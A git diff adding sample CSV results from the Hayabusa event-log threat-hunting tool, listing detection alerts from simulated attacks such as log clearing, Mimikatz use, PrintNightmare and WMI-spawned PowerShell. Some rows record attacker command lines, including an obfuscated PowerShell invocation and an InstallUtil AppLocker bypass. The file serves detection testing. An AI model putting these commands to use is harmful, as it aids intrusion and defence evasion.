admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx \ No newline at end of file diff --git a/sample-results/hayabusa-sample-results-2022-04-16.csv b/sample-results/hayabusa-sample-results-2022-04-16.csv new file mode 100644 index 00000000..55a6f0af --- /dev/null +++ b/sample-results/hayabusa-sample-results-2022-04-16.csv @@ -0,0 +1,18158 @@ +Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath +2013-10-23 16:16:13.843 +00:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:16:27.000 +00:00,37L4247D28-05,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:29.468 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:32.328 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:38.218 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:40.125 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:41.421 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto 